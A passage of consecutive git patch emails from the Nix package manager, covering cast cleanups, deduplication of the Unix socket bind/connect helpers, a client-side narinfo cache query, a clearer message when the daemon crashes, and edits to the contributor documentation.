startProcess([&] { try { pipe.readSide.close(); Path dir = dirOf(path); diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 8f310c6fe..75bb31c9b 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -183,7 +183,7 @@ std::string base64Encode(std::string_view s) std::string base64Decode(std::string_view s) { constexpr char npos = -1; - constexpr std::array base64DecodeChars = [&]() { + constexpr std::array base64DecodeChars = [&] { std::array result{}; for (auto& c : result) c = npos; From d11d7849f7676eb8b2c771356b9be8d8bb756cc8 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:51:47 +0100 Subject: [PATCH 281/654] Use ChildWrapperFunction type and make casts more explicit --- src/libutil/processes.cc | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/src/libutil/processes.cc b/src/libutil/processes.cc index e1e60302b..28f1adcf0 100644 --- a/src/libutil/processes.cc +++ b/src/libutil/processes.cc @@ -168,11 +168,12 @@ void killUser(uid_t uid) ////////////////////////////////////////////////////////////////////// +using ChildWrapperFunction = std::function; /* Wrapper around vfork to prevent the child process from clobbering the caller's stack frame in the parent. */ -static pid_t doFork(bool allowVfork, std::function fun) __attribute__((noinline)); -static pid_t doFork(bool allowVfork, std::function fun) +static pid_t doFork(bool allowVfork, ChildWrapperFunction & fun) __attribute__((noinline)); +static pid_t doFork(bool allowVfork, ChildWrapperFunction & fun) { #ifdef __linux__ pid_t pid = allowVfork ? vfork() : fork(); @@ -188,8 +189,8 @@ static pid_t doFork(bool allowVfork, std::function fun) #if __linux__ static int childEntry(void * arg) { - auto main = (std::function *) arg; - (*main)(); + auto & fun = *reinterpret_cast(arg); + fun(); return 1; } #endif From 9d9f42cc38b06ddc3fe30f4c1695514774b5217e Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:52:38 +0100 Subject: [PATCH 282/654] Remove C-style casts --- src/libutil/file-descriptor.cc | 2 +- src/libutil/processes.cc | 4 ++-- src/libutil/unix-domain-socket.cc | 18 ++++++++++++++---- 3 files changed, 17 insertions(+), 7 deletions(-) diff --git a/src/libutil/file-descriptor.cc b/src/libutil/file-descriptor.cc index 43e3cd979..55d57e29b 100644 --- a/src/libutil/file-descriptor.cc +++ b/src/libutil/file-descriptor.cc @@ -114,7 +114,7 @@ void drainFD(int fd, Sink & sink, bool block) throw SysError("reading from file"); } else if (rd == 0) break; - else sink({(char *) buf.data(), (size_t) rd}); + else sink({reinterpret_cast(buf.data()), size_t(rd)}); } } diff --git a/src/libutil/processes.cc b/src/libutil/processes.cc index 28f1adcf0..f5d584330 100644 --- a/src/libutil/processes.cc +++ b/src/libutil/processes.cc @@ -226,8 +226,8 @@ pid_t startProcess(std::function fun, const ProcessOptions & options) assert(!(options.cloneFlags & CLONE_VM)); size_t stackSize = 1 * 1024 * 1024; - auto stack = (char *) mmap(0, stackSize, - PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0); + auto stack = static_cast(mmap(0, stackSize, + PROT_WRITE | PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0)); if (stack == MAP_FAILED) throw SysError("allocating stack"); Finally freeStack([&] { munmap(stack, stackSize); }); diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index dc19daf9e..3b6d54a2c 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -38,6 +38,14 @@ AutoCloseFD createUnixDomainSocket(const Path & path, mode_t mode) return fdSocket; } +static struct sockaddr* safeSockAddrPointerCast(struct sockaddr_un *addr) { + // Casting between types like these legacy C library interfaces require + // is forbidden in C++. + // To maintain backwards compatibility, the implementation of the + // bind function contains some hints to the compiler that allow for this + // special case. + return reinterpret_cast(addr); +} void bind(int fd, const std::string & path) { @@ -45,6 +53,7 @@ void bind(int fd, const std::string & path) struct sockaddr_un addr; addr.sun_family = AF_UNIX; + auto psaddr {safeSockAddrPointerCast(&addr)}; if (path.size() + 1 >= sizeof(addr.sun_path)) { Pid pid = startProcess([&] { @@ -55,7 +64,7 @@ void bind(int fd, const std::string & path) if (base.size() + 1 >= sizeof(addr.sun_path)) throw Error("socket path '%s' is too long", base); memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (bind(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (bind(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot bind to socket '%s'", path); _exit(0); }); @@ -64,7 +73,7 @@ void bind(int fd, const std::string & path) throw Error("cannot bind to socket '%s'", path); } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (bind(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (bind(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot bind to socket '%s'", path); } } @@ -74,6 +83,7 @@ void connect(int fd, const std::string & path) { struct sockaddr_un addr; addr.sun_family = AF_UNIX; + auto psaddr {safeSockAddrPointerCast(&addr)}; if (path.size() + 1 >= sizeof(addr.sun_path)) { Pipe pipe; @@ -88,7 +98,7 @@ void connect(int fd, const std::string & path) if (base.size() + 1 >= sizeof(addr.sun_path)) throw Error("socket path '%s' is too long", base); memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (connect(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot connect to socket at '%s'", path); writeFull(pipe.writeSide.get(), "0\n"); } catch (SysError & e) { @@ -107,7 +117,7 @@ void connect(int fd, const std::string & path) } } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) + if (connect(fd, psaddr, sizeof(addr)) == -1) throw SysError("cannot connect to socket at '%s'", path); } } From 8ae3aeec9442e2b249abdb42a2853618b74a68a2 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Thu, 2 Nov 2023 15:52:53 +0100 Subject: [PATCH 283/654] Don't use std::make_unique right before release --- src/libutil/signals.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/signals.cc b/src/libutil/signals.cc index 4632aa319..eaa4ea30e 100644 --- a/src/libutil/signals.cc +++ b/src/libutil/signals.cc @@ -179,7 +179,7 @@ std::unique_ptr createInterruptCallback(std::function auto token = interruptCallbacks->nextToken++; interruptCallbacks->callbacks.emplace(token, callback); - auto res = std::make_unique(); + std::unique_ptr res {new InterruptCallbackImpl{}}; res->token = token; return std::unique_ptr(res.release()); From 55da93942428d51ba3fa3577d3ff79cd739fb38e Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Wed, 17 Jan 2024 02:57:11 +0100 Subject: [PATCH 284/654] fix typo --- doc/manual/src/contributing/documentation.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/contributing/documentation.md b/doc/manual/src/contributing/documentation.md index 75226cd1a..1dddb207c 100644 --- a/doc/manual/src/contributing/documentation.md +++ b/doc/manual/src/contributing/documentation.md @@ -172,7 +172,7 @@ Please observe these guidelines to ease reviews: > ``` ```` - Highlight syntax definiions as such, using [EBNF](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form) notation: + Highlight syntax definitions as such, using [EBNF](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form) notation: ```` > **Syntax** From f134dbdffb81cea72a2e4abfb9a13904417b82aa Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Wed, 17 Jan 2024 04:23:16 +0100 Subject: [PATCH 285/654] move section on make variables it should be after the general build instructions, as it goes into more detail. --- doc/manual/src/contributing/hacking.md | 42 +++++++++++++------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 0fa59e891..fbdc7b7f7 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -67,27 +67,6 @@ $ nix build You can also build Nix for one of the [supported platforms](#platforms). -## Makefile variables - -You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run -`make install`. - -You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment -variables to override `Makefile` variables. - -- `ENABLE_BUILD=yes` to enable building the C++ code. -- `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). - - The docs can take a while to build, so you may want to disable this for local development. -- `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. -- `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. -- `OPTIMIZE=1` to enable optimizations. -- `libraries=libutil programs=` to only build a specific library (this will - fail in the linking phase if you don't have the other libraries built, but is - useful for checking types). -- `libraries= programs=nix` to only build a specific program (this will not, in - general, work, because the programs need the libraries). - ## Building Nix To build all dependencies and start a shell in which all environment variables are set up so that those dependencies can be found: @@ -132,6 +111,27 @@ $ nix-build You can also build Nix for one of the [supported platforms](#platforms). +## Makefile variables + +You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run +`make install`. + +You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment +variables to override `Makefile` variables. + +- `ENABLE_BUILD=yes` to enable building the C++ code. +- `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). + + The docs can take a while to build, so you may want to disable this for local development. +- `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. +- `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. +- `OPTIMIZE=1` to enable optimizations. +- `libraries=libutil programs=` to only build a specific library (this will + fail in the linking phase if you don't have the other libraries built, but is + useful for checking types). +- `libraries= programs=nix` to only build a specific program (this will not, in + general, work, because the programs need the libraries). + ## Platforms Nix can be built for various platforms, as specified in [`flake.nix`]: From 28eb406834ed176d84e22898ccbcf4ecb963416c Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Wed, 17 Jan 2024 04:39:26 +0100 Subject: [PATCH 286/654] reword section on make variables - use one line per sentence - use imperative for instructions - add link to Make documentation --- doc/manual/src/contributing/hacking.md | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index fbdc7b7f7..fe91787a3 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -113,11 +113,9 @@ You can also build Nix for one of the [supported platforms](#platforms). ## Makefile variables -You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run -`make install`. +You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run `make install`. -You may want to set `MAKEFLAGS="-e -j $NIX_BUILD_CORES"` to allow environment -variables to override `Makefile` variables. +Run `make` with [`--environment-overrides`](https://www.gnu.org/software/make/manual/make.html#index-_002de) to allow environment variables to override `Makefile` variables: - `ENABLE_BUILD=yes` to enable building the C++ code. - `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). @@ -126,11 +124,12 @@ variables to override `Makefile` variables. - `ENABLE_FUNCTIONAL_TESTS=yes` to enable building the functional tests. - `ENABLE_UNIT_TESTS=yes` to enable building the unit tests. - `OPTIMIZE=1` to enable optimizations. -- `libraries=libutil programs=` to only build a specific library (this will - fail in the linking phase if you don't have the other libraries built, but is - useful for checking types). -- `libraries= programs=nix` to only build a specific program (this will not, in - general, work, because the programs need the libraries). +- `libraries=libutil programs=` to only build a specific library. + + This will fail in the linking phase if the other libraries haven't been built, but is useful for checking types. +- `libraries= programs=nix` to only build a specific program. + + This will not work in general, because the programs need the libraries. ## Platforms From d0a284284bc93014c98294292b7f4b95864f37ee Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 17 Jan 2024 16:54:45 +0100 Subject: [PATCH 287/654] refactor: Extract simply, awkwardly Store::queryPathInfoFromClientCache This is useful for determining quickly which substituters to query. An alternative would be for users to invoke the narinfo cache db directly, so why do we need this change? - It is easier to use. I believe Nix itself should also use it. - This way, the narinfo cache db remains an implementation detail. - Callers get to use the in-memory cache as well. --- src/libstore/store-api.cc | 64 +++++++++++++++++++++++---------------- src/libstore/store-api.hh | 12 ++++++++ 2 files changed, 50 insertions(+), 26 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 0c37ecd30..66bc95625 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -685,6 +685,42 @@ static bool goodStorePath(const StorePath & expected, const StorePath & actual) && (expected.name() == Store::MissingName || expected.name() == actual.name()); } +bool Store::queryPathInfoFromClientCache(const StorePath & storePath, + Callback> & callback) +{ + auto hashPart = std::string(storePath.hashPart()); + + { + auto res = state.lock()->pathInfoCache.get(std::string(storePath.to_string())); + if (res && res->isKnownNow()) { + stats.narInfoReadAverted++; + if (!res->didExist()) + throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); + callback(ref(res->value)); + return true; + } + } + + if (diskCache) { + auto res = diskCache->lookupNarInfo(getUri(), hashPart); + if (res.first != NarInfoDiskCache::oUnknown) { + stats.narInfoReadAverted++; + { + auto state_(state.lock()); + state_->pathInfoCache.upsert(std::string(storePath.to_string()), + res.first == NarInfoDiskCache::oInvalid ? PathInfoCacheValue{} : PathInfoCacheValue{ .value = res.second }); + if (res.first == NarInfoDiskCache::oInvalid || + !goodStorePath(storePath, res.second->path)) + throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); + } + callback(ref(res.second)); + return true; + } + } + + return false; +} + void Store::queryPathInfo(const StorePath & storePath, Callback> callback) noexcept @@ -692,32 +728,8 @@ void Store::queryPathInfo(const StorePath & storePath, auto hashPart = std::string(storePath.hashPart()); try { - { - auto res = state.lock()->pathInfoCache.get(std::string(storePath.to_string())); - if (res && res->isKnownNow()) { - stats.narInfoReadAverted++; - if (!res->didExist()) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - return callback(ref(res->value)); - } - } - - if (diskCache) { - auto res = diskCache->lookupNarInfo(getUri(), hashPart); - if (res.first != NarInfoDiskCache::oUnknown) { - stats.narInfoReadAverted++; - { - auto state_(state.lock()); - state_->pathInfoCache.upsert(std::string(storePath.to_string()), - res.first == NarInfoDiskCache::oInvalid ? PathInfoCacheValue{} : PathInfoCacheValue{ .value = res.second }); - if (res.first == NarInfoDiskCache::oInvalid || - !goodStorePath(storePath, res.second->path)) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - } - return callback(ref(res.second)); - } - } - + if (queryPathInfoFromClientCache(storePath, callback)) + return; } catch (...) { return callback.rethrow(); } auto callbackPtr = std::make_shared(std::move(callback)); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 9667b5e9e..2a1092d9e 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -282,6 +282,18 @@ public: void queryPathInfo(const StorePath & path, Callback> callback) noexcept; + /** + * NOTE: this is not the final interface - to be modified in next commit. + * + * Asynchronous version that only queries the local narinfo cache and not + * the actual store. + * + * @return true if the path was known and the callback invoked + * @return false if the path was not known and the callback not invoked + * @throw InvalidPathError if the path is known to be invalid + */ + bool queryPathInfoFromClientCache(const StorePath & path, Callback> & callback); + /** * Query the information about a realisation. */ From e938912cff5ccded14444377f9776e86c585f917 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 17 Jan 2024 13:08:03 -0500 Subject: [PATCH 288/654] Fix indentation error in `flake.nix` --- flake.nix | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/flake.nix b/flake.nix index 49f214e72..0309f84b3 100644 --- a/flake.nix +++ b/flake.nix @@ -197,12 +197,12 @@ perl-bindings = final.nix-perl-bindings; }; - nix-perl-bindings = final.callPackage ./perl { - inherit fileset stdenv; - }; - + nix-perl-bindings = final.callPackage ./perl { + inherit fileset stdenv; }; + }; + in { # A Nixpkgs overlay that overrides the 'nix' and # 'nix.perl-bindings' packages. From 1de8eed28a3cb1e449c10ecdb524aec27fe9dc35 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 17 Jan 2024 13:11:04 -0500 Subject: [PATCH 289/654] Move dependency patches from top level into subdir Good to not clutter the top-level directory. --- .../boehmgc-coroutine-sp-fallback.diff | 0 .../boehmgc-traceable_allocator-public.diff | 0 flake.nix | 4 ++-- package.nix | 1 - 4 files changed, 2 insertions(+), 3 deletions(-) rename boehmgc-coroutine-sp-fallback.diff => dep-patches/boehmgc-coroutine-sp-fallback.diff (100%) rename boehmgc-traceable_allocator-public.diff => dep-patches/boehmgc-traceable_allocator-public.diff (100%) diff --git a/boehmgc-coroutine-sp-fallback.diff b/dep-patches/boehmgc-coroutine-sp-fallback.diff similarity index 100% rename from boehmgc-coroutine-sp-fallback.diff rename to dep-patches/boehmgc-coroutine-sp-fallback.diff diff --git a/boehmgc-traceable_allocator-public.diff b/dep-patches/boehmgc-traceable_allocator-public.diff similarity index 100% rename from boehmgc-traceable_allocator-public.diff rename to dep-patches/boehmgc-traceable_allocator-public.diff diff --git a/flake.nix b/flake.nix index 49f214e72..2b9ce17e3 100644 --- a/flake.nix +++ b/flake.nix @@ -163,10 +163,10 @@ enableLargeConfig = true; }).overrideAttrs(o: { patches = (o.patches or []) ++ [ - ./boehmgc-coroutine-sp-fallback.diff + ./dep-patches/boehmgc-coroutine-sp-fallback.diff # https://github.com/ivmai/bdwgc/pull/586 - ./boehmgc-traceable_allocator-public.diff + ./dep-patches/boehmgc-traceable_allocator-public.diff ]; }); diff --git a/package.nix b/package.nix index a1188ba9c..192df90ab 100644 --- a/package.nix +++ b/package.nix @@ -174,7 +174,6 @@ in { ./mk (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) ] ++ lib.optionals doBuild [ - ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc ./precompiled-headers.h From 39ab50f9ee64f0455e37a8136638d9757252c226 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 17 Jan 2024 21:41:37 +0100 Subject: [PATCH 290/654] Store::buildPaths(): Fix display of store paths This was broken in 7ac39ff05c8353c665174e8df61dd76a2b0b93db. --- src/libstore/build/entry-points.cc | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libstore/build/entry-points.cc b/src/libstore/build/entry-points.cc index 74eca63f3..7f0a05d5d 100644 --- a/src/libstore/build/entry-points.cc +++ b/src/libstore/build/entry-points.cc @@ -26,9 +26,9 @@ void Store::buildPaths(const std::vector & reqs, BuildMode buildMod } if (i->exitCode != Goal::ecSuccess) { if (auto i2 = dynamic_cast(i.get())) - failed.insert(std::string { i2->drvPath.to_string() }); + failed.insert(printStorePath(i2->drvPath)); else if (auto i2 = dynamic_cast(i.get())) - failed.insert(std::string { i2->storePath.to_string()}); + failed.insert(printStorePath(i2->storePath)); } } From a3cf27ca47328b11173147ca7180e0bae798bb2c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 17 Jan 2024 22:19:51 +0100 Subject: [PATCH 291/654] Print a more helpful message if the daemon crashes Instead of error: unexpected end-of-file you now get error: Nix daemon disconnected unexpectedly (maybe it crashed?) --- src/libstore/remote-store.cc | 1 + src/libutil/serialise.cc | 2 +- src/libutil/serialise.hh | 5 +++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc index 078b9fe00..ccf95beef 100644 --- a/src/libstore/remote-store.cc +++ b/src/libstore/remote-store.cc @@ -67,6 +67,7 @@ void RemoteStore::initConnection(Connection & conn) { /* Send the magic greeting, check for the reply. */ try { + conn.from.endOfFileError = "Nix daemon disconnected unexpectedly (maybe it crashed?)"; conn.to << WORKER_MAGIC_1; conn.to.flush(); StringSink saved; diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index 316105603..afbf66b9d 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -132,7 +132,7 @@ size_t FdSource::readUnbuffered(char * data, size_t len) n = ::read(fd, data, len); } while (n == -1 && errno == EINTR); if (n == -1) { _good = false; throw SysError("reading from file"); } - if (n == 0) { _good = false; throw EndOfFile("unexpected end-of-file"); } + if (n == 0) { _good = false; throw EndOfFile(endOfFileError); } read += n; return n; } diff --git a/src/libutil/serialise.hh b/src/libutil/serialise.hh index 3f57ce88b..689b2070b 100644 --- a/src/libutil/serialise.hh +++ b/src/libutil/serialise.hh @@ -153,12 +153,13 @@ struct FdSource : BufferedSource { int fd; size_t read = 0; + std::string endOfFileError{"unexpected end-of-file"}; FdSource() : fd(-1) { } FdSource(int fd) : fd(fd) { } - FdSource(FdSource&&) = default; + FdSource(FdSource &&) = default; - FdSource& operator=(FdSource && s) + FdSource & operator=(FdSource && s) { fd = s.fd; s.fd = -1; From 3016e67c21c8ea1f1c44528c7895fad1761406c3 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 16 Jan 2024 10:35:16 -0500 Subject: [PATCH 292/654] `bind`: give same treatment as `connect` in #8544, dedup It is good to propagate the underlying error so whether or not we use a process to deal with path length issues is not observable. Also, as these wrapper functions got more and more complex, the code duplication got worse and worse. The new `bindConnectProcHelper` function deduplicates them. --- src/libutil/unix-domain-socket.cc | 84 ++++++++++++------------------- 1 file changed, 33 insertions(+), 51 deletions(-) diff --git a/src/libutil/unix-domain-socket.cc b/src/libutil/unix-domain-socket.cc index 3b6d54a2c..0bcf9040d 100644 --- a/src/libutil/unix-domain-socket.cc +++ b/src/libutil/unix-domain-socket.cc @@ -38,52 +38,20 @@ AutoCloseFD createUnixDomainSocket(const Path & path, mode_t mode) return fdSocket; } -static struct sockaddr* safeSockAddrPointerCast(struct sockaddr_un *addr) { - // Casting between types like these legacy C library interfaces require - // is forbidden in C++. - // To maintain backwards compatibility, the implementation of the - // bind function contains some hints to the compiler that allow for this + +static void bindConnectProcHelper( + std::string_view operationName, auto && operation, + int fd, const std::string & path) +{ + struct sockaddr_un addr; + addr.sun_family = AF_UNIX; + + // Casting between types like these legacy C library interfaces + // require is forbidden in C++. To maintain backwards + // compatibility, the implementation of the bind/connect functions + // contains some hints to the compiler that allow for this // special case. - return reinterpret_cast(addr); -} - -void bind(int fd, const std::string & path) -{ - unlink(path.c_str()); - - struct sockaddr_un addr; - addr.sun_family = AF_UNIX; - auto psaddr {safeSockAddrPointerCast(&addr)}; - - if (path.size() + 1 >= sizeof(addr.sun_path)) { - Pid pid = startProcess([&] { - Path dir = dirOf(path); - if (chdir(dir.c_str()) == -1) - throw SysError("chdir to '%s' failed", dir); - std::string base(baseNameOf(path)); - if (base.size() + 1 >= sizeof(addr.sun_path)) - throw Error("socket path '%s' is too long", base); - memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (bind(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot bind to socket '%s'", path); - _exit(0); - }); - int status = pid.wait(); - if (status != 0) - throw Error("cannot bind to socket '%s'", path); - } else { - memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (bind(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot bind to socket '%s'", path); - } -} - - -void connect(int fd, const std::string & path) -{ - struct sockaddr_un addr; - addr.sun_family = AF_UNIX; - auto psaddr {safeSockAddrPointerCast(&addr)}; + auto * psaddr = reinterpret_cast(&addr); if (path.size() + 1 >= sizeof(addr.sun_path)) { Pipe pipe; @@ -98,8 +66,8 @@ void connect(int fd, const std::string & path) if (base.size() + 1 >= sizeof(addr.sun_path)) throw Error("socket path '%s' is too long", base); memcpy(addr.sun_path, base.c_str(), base.size() + 1); - if (connect(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot connect to socket at '%s'", path); + if (operation(fd, psaddr, sizeof(addr)) == -1) + throw SysError("cannot %s to socket at '%s'", operationName, path); writeFull(pipe.writeSide.get(), "0\n"); } catch (SysError & e) { writeFull(pipe.writeSide.get(), fmt("%d\n", e.errNo)); @@ -110,16 +78,30 @@ void connect(int fd, const std::string & path) pipe.writeSide.close(); auto errNo = string2Int(chomp(drainFD(pipe.readSide.get()))); if (!errNo || *errNo == -1) - throw Error("cannot connect to socket at '%s'", path); + throw Error("cannot %s to socket at '%s'", operationName, path); else if (*errNo > 0) { errno = *errNo; - throw SysError("cannot connect to socket at '%s'", path); + throw SysError("cannot %s to socket at '%s'", operationName, path); } } else { memcpy(addr.sun_path, path.c_str(), path.size() + 1); - if (connect(fd, psaddr, sizeof(addr)) == -1) - throw SysError("cannot connect to socket at '%s'", path); + if (operation(fd, psaddr, sizeof(addr)) == -1) + throw SysError("cannot %s to socket at '%s'", operationName, path); } } + +void bind(int fd, const std::string & path) +{ + unlink(path.c_str()); + + bindConnectProcHelper("bind", ::bind, fd, path); +} + + +void connect(int fd, const std::string & path) +{ + bindConnectProcHelper("connect", ::connect, fd, path); +} + } From 574db8350491d8da3f65625de1f91bc667e67360 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 17 Jan 2024 23:46:03 -0500 Subject: [PATCH 293/654] Push `addToStoreFromDump` `unsupported(...)` down `Store` class hierarchy Instead of having it be the default method in `Store` itself, have it be the implementation in `DummyStore` and `LegacySSHStore`. Then just the implementations which fail to provide the method pay the "penalty" of dealing with the icky `unimplemented` function for non-compliance. Picks up where #8217. Getting close to no `unsupported` in the `Store` interface itself! More progress on issue #5729. --- src/libstore/dummy-store.cc | 9 +++++++++ src/libstore/legacy-ssh-store.hh | 9 +++++++++ src/libstore/store-api.hh | 3 +-- 3 files changed, 19 insertions(+), 2 deletions(-) diff --git a/src/libstore/dummy-store.cc b/src/libstore/dummy-store.cc index f52a309d1..e4f13b8f4 100644 --- a/src/libstore/dummy-store.cc +++ b/src/libstore/dummy-store.cc @@ -58,6 +58,15 @@ struct DummyStore : public virtual DummyStoreConfig, public virtual Store RepairFlag repair, CheckSigsFlag checkSigs) override { unsupported("addToStore"); } + virtual StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) override + { unsupported("addToStore"); } + void narFromPath(const StorePath & path, Sink & sink) override { unsupported("narFromPath"); } diff --git a/src/libstore/legacy-ssh-store.hh b/src/libstore/legacy-ssh-store.hh index c5a3ce677..7cee31d66 100644 --- a/src/libstore/legacy-ssh-store.hh +++ b/src/libstore/legacy-ssh-store.hh @@ -69,6 +69,15 @@ struct LegacySSHStore : public virtual LegacySSHStoreConfig, public virtual Stor RepairFlag repair) override { unsupported("addToStore"); } + virtual StorePath addToStoreFromDump( + Source & dump, + std::string_view name, + ContentAddressMethod method = FileIngestionMethod::Recursive, + HashAlgorithm hashAlgo = HashAlgorithm::SHA256, + const StorePathSet & references = StorePathSet(), + RepairFlag repair = NoRepair) override + { unsupported("addToStore"); } + private: void putBuildSettings(Connection & conn); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 9667b5e9e..b3c935db1 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -466,8 +466,7 @@ public: ContentAddressMethod method = FileIngestionMethod::Recursive, HashAlgorithm hashAlgo = HashAlgorithm::SHA256, const StorePathSet & references = StorePathSet(), - RepairFlag repair = NoRepair) - { unsupported("addToStoreFromDump"); } + RepairFlag repair = NoRepair) = 0; /** * Add a mapping indicating that `deriver!outputName` maps to the output path From 78074bdea4fcb4403cc7b1e533d1fcbcf51e01a5 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 12:47:29 +0100 Subject: [PATCH 294/654] tests/nixos/fetch-git: Apply suggestions --- tests/nixos/fetch-git/default.nix | 2 +- tests/nixos/fetch-git/testsupport/setup.nix | 3 --- 2 files changed, 1 insertion(+), 4 deletions(-) diff --git a/tests/nixos/fetch-git/default.nix b/tests/nixos/fetch-git/default.nix index 254fecaaf..1d6bcb637 100644 --- a/tests/nixos/fetch-git/default.nix +++ b/tests/nixos/fetch-git/default.nix @@ -24,7 +24,7 @@ testCases = map (testCaseName: {...}: { - imports = ["${./test-cases}/${testCaseName}"]; + imports = [ (./test-cases + "/${testCaseName}") ]; # ensures tests are named like their directories they are defined in name = testCaseName; }) diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix index 2f74f51f8..8fc8e2e7c 100644 --- a/tests/nixos/fetch-git/testsupport/setup.nix +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -39,9 +39,6 @@ in The name of the test case. A repository with that name will be set up on the gitea server and locally. - - This name can also be used to execute only a single test case via: - `nix build .#hydraJobs.fetch-git.{test-case-name}` ''; }; options.description = mkOption { From 1fe8f54bd30fead52d21ae472fb4f0f68a5c6fdd Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 15:27:57 +0100 Subject: [PATCH 295/654] Use BackedStringView --- src/libutil/serialise.cc | 2 +- src/libutil/serialise.hh | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/src/libutil/serialise.cc b/src/libutil/serialise.cc index afbf66b9d..7fc211491 100644 --- a/src/libutil/serialise.cc +++ b/src/libutil/serialise.cc @@ -132,7 +132,7 @@ size_t FdSource::readUnbuffered(char * data, size_t len) n = ::read(fd, data, len); } while (n == -1 && errno == EINTR); if (n == -1) { _good = false; throw SysError("reading from file"); } - if (n == 0) { _good = false; throw EndOfFile(endOfFileError); } + if (n == 0) { _good = false; throw EndOfFile(std::string(*endOfFileError)); } read += n; return n; } diff --git a/src/libutil/serialise.hh b/src/libutil/serialise.hh index 689b2070b..d9522566f 100644 --- a/src/libutil/serialise.hh 